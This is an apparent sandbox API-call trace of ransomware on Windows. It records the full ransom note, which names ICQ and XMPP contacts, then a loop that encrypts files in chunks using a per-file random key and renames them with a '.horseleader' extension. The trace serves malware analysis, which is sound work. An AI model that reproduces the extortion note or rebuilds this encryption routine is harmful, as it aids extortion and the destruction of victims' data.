dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0226.164] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0226.164] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0226.168] lstrlenA (lpString="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") returned 1368 [0226.168] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0226.168] CloseHandle (hObject=0x21c) returned 1 [0226.168] GetProcessHeap () returned 0x780000 [0226.169] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0226.169] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc25b4860, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc25b4860, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="GRPHFLT", cAlternateFileName="")) returned 1 [0226.169] lstrcmpiW (lpString1="GRPHFLT", lpString2="Windows") returned -1 [0226.169] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT") returned 58 [0226.169] lstrcmpW (lpString1="GRPHFLT", lpString2=".") returned 1 [0226.169] lstrcmpW (lpString1="GRPHFLT", lpString2="..") returned 1 [0226.169] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0226.169] GetProcessHeap () returned 0x780000 [0226.169] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, 
Size=0x840) returned 0x7d9fd8 [0226.169] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\*") returned 60 [0226.169] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc25b4860, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc25b4860, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0226.173] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0226.173] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\.") returned 60 [0226.173] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0226.173] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc25b4860, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc25b4860, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0226.173] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0226.173] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\..") returned 61 [0226.174] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0226.174] lstrcmpW (lpString1="..", lpString2="..") returned 0 
[0226.174] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeec79e70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x1a9b, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="CGMIMP32.CFG", cAlternateFileName="")) returned 1 [0226.174] lstrcmpiW (lpString1="CGMIMP32.CFG", lpString2="Windows") returned -1 [0226.174] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 71 [0226.174] StrStrIW (lpFirst="CGMIMP32.CFG", lpSrch=".horseleader") returned 0x0 [0226.174] lstrcmpW (lpString1="CGMIMP32.CFG", lpString2="#Decrypt#.txt") returned 1 [0226.174] lstrcmpW (lpString1="CGMIMP32.CFG", lpString2="_uninstalling_.png") returned 1 [0226.174] lstrlenW (lpString=".testttjffg") returned 11 [0226.174] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG", lpSrch=".testttjffg") returned 0x0 [0226.174] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0226.174] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0226.174] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0226.175] lstrlenW (lpString="\\\\?\\C:\\Program 
Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 71 [0226.175] StrStrW (lpFirst="CGMIMP32.CFG", lpSrch=".txt") returned 0x0 [0226.175] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=6811) returned 1 [0226.175] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1a9b, lpOverlapped=0x0) returned 1 [0226.540] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe565, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0226.540] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1a9b, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1a9b, lpOverlapped=0x0) returned 1 [0226.541] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0226.541] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0226.589] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0226.592] CloseHandle (hObject=0x158) returned 1 [0226.592] GetProcessHeap () returned 0x780000 [0226.592] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0226.592] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG.horseleader") returned 83 [0226.592] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\GRPHFLT\\CGMIMP32.CFG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg.horseleader")) returned 1 [0226.593] GetProcessHeap () returned 0x780000 [0226.593] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0226.627] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfda4ec00, ftCreationTime.dwHighDateTime=0x1cba021, ftLastAccessTime.dwLowDateTime=0xc22488c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xfda4ec00, ftLastWriteTime.dwHighDateTime=0x1cba021, nFileSizeHigh=0x0, nFileSizeLow=0x4f160, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="CGMIMP32.FLT", cAlternateFileName="")) returned 1 [0226.627] lstrcmpiW (lpString1="CGMIMP32.FLT", lpString2="Windows") returned -1 [0226.627] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 71 [0226.627] StrStrIW (lpFirst="CGMIMP32.FLT", lpSrch=".horseleader") returned 0x0 [0226.627] lstrcmpW (lpString1="CGMIMP32.FLT", lpString2="#Decrypt#.txt") returned 1 [0226.627] lstrcmpW (lpString1="CGMIMP32.FLT", lpString2="_uninstalling_.png") returned 1 [0226.627] lstrlenW (lpString=".testttjffg") returned 11 [0226.627] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT", lpSrch=".testttjffg") returned 0x0 [0226.627] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0226.627] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, 
dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0226.627] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0226.653] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 71 [0226.653] StrStrW (lpFirst="CGMIMP32.FLT", lpSrch=".txt") returned 0x0 [0226.653] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=323936) returned 1 [0226.655] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0226.655] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.660] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0226.660] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.661] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x250b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0226.661] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.681] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, 
lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0226.681] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.681] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x4a160, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0226.682] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.708] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0226.708] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.708] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0226.708] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0226.708] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0226.708] CloseHandle (hObject=0x158) returned 1 [0226.709] GetProcessHeap () returned 0x780000 [0226.709] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0226.709] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" 
| out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT.horseleader") returned 83 [0226.709] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.flt"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.flt.horseleader")) returned 1 [0226.718] GetProcessHeap () returned 0x780000 [0226.722] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0226.722] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeec79e70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x93f6e, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="CGMIMP32.FNT", cAlternateFileName="")) returned 1 [0226.724] lstrcmpiW (lpString1="CGMIMP32.FNT", lpString2="Windows") returned -1 [0226.724] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 71 [0226.724] StrStrIW (lpFirst="CGMIMP32.FNT", lpSrch=".horseleader") returned 0x0 [0226.724] lstrcmpW (lpString1="CGMIMP32.FNT", lpString2="#Decrypt#.txt") returned 1 [0226.724] lstrcmpW (lpString1="CGMIMP32.FNT", lpString2="_uninstalling_.png") returned 1 [0226.724] lstrlenW (lpString=".testttjffg") returned 11 [0226.724] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT", lpSrch=".testttjffg") returned 0x0 [0226.724] CryptGenRandom (in: 
hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0226.724] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0226.724] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.fnt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0226.730] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 71 [0226.823] StrStrW (lpFirst="CGMIMP32.FNT", lpSrch=".txt") returned 0x0 [0226.840] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=606062) returned 1 [0226.840] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0226.840] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.861] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0226.862] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.862] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x477b7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0226.862] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, 
lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.865] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0226.865] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.865] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x8ef6e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0226.865] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.868] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0226.869] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.869] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0226.869] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0226.869] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0226.869] CloseHandle (hObject=0x158) 
returned 1 [0226.870] GetProcessHeap () returned 0x780000 [0226.870] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0226.870] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT.horseleader") returned 83 [0226.870] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.fnt"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.fnt.horseleader")) returned 1 [0226.871] GetProcessHeap () returned 0x780000 [0226.871] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0226.871] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8a19600, ftCreationTime.dwHighDateTime=0x1caa4ff, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8a19600, ftLastWriteTime.dwHighDateTime=0x1caa4ff, nFileSizeHigh=0x0, nFileSizeLow=0xadf90, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="EPSIMP32.FLT", cAlternateFileName="")) returned 1 [0226.871] lstrcmpiW (lpString1="EPSIMP32.FLT", lpString2="Windows") returned -1 [0226.871] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 71 [0226.871] StrStrIW (lpFirst="EPSIMP32.FLT", lpSrch=".horseleader") returned 0x0 [0226.871] lstrcmpW (lpString1="EPSIMP32.FLT", lpString2="#Decrypt#.txt") returned 1 [0226.871] lstrcmpW (lpString1="EPSIMP32.FLT", lpString2="_uninstalling_.png") returned 1 [0226.871] 
lstrlenW (lpString=".testttjffg") returned 11 [0226.871] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT", lpSrch=".testttjffg") returned 0x0 [0226.871] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0226.871] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0226.871] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\epsimp32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0226.872] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 71 [0226.872] StrStrW (lpFirst="EPSIMP32.FLT", lpSrch=".txt") returned 0x0 [0226.872] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=712592) returned 1 [0226.872] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0226.872] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.981] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, 